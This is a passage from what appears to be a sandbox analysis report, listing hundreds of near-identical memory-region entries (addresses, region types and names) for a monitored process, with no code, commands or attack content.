start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8936 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8937 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8938 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8939 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8940 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8941 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8942 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8943 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8944 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8945 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8946 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8947 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8948 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8949 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8950 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8951 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8952 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8953 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8954 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8955 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8956 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8957 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8958 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8959 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8960 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8961 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8962 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8963 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8964 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8965 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8966 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8967 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8968 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8969 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8970 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8971 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8972 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8973 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8974 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8975 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8976 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8977 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8978 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8979 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8980 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8981 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8982 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8983 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8984 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8985 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8986 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8987 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8988 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8989 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8990 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8991 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8992 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 8993 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 8994 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8995 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8996 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8997 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8998 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 8999 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9000 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9001 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9002 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9003 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9004 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9005 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9006 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9007 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9008 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9009 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9010 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9011 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9012 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9013 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9014 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9015 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9016 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9017 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9018 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9019 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9020 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9021 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9022 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9023 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9024 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9025 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9026 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9027 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9028 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9029 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9030 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9031 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9032 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9033 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9034 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9035 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9036 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9037 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9038 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9039 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9040 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9041 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9042 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9043 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9044 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9045 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9046 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9047 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9048 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9049 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9050 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9051 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9052 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9053 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9054 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9055 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9056 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9057 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9058 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9059 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9060 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9061 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9062 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9063 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9064 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9065 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9066 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9067 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9068 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9069 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9070 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9071 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9072 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9073 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9074 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9075 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9076 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9077 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9078 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9079 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9080 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9081 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9082 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9083 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9084 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9085 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9086 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9087 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9088 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9089 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9090 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9091 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9092 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9093 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9094 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9095 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9096 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9097 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9098 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9099 start_va = 0x2880000 end_va = 0x2880fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9100 start_va = 0x2880000 end_va = 0x288ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002880000" filename = "" Region: id = 9101 start_va = 0x4120000 end_va = 0x413dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004120000" filename = "" Region: id = 9102 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9103 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9104 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9105 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9106 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9107 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9108 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9109 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9110 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9111 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9112 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9113 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9114 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9115 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9116 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9117 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9118 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9119 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9120 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9121 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = "" Region: id = 9122 start_va = 0x2880000 end_va = 0x288efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002880000" filename = 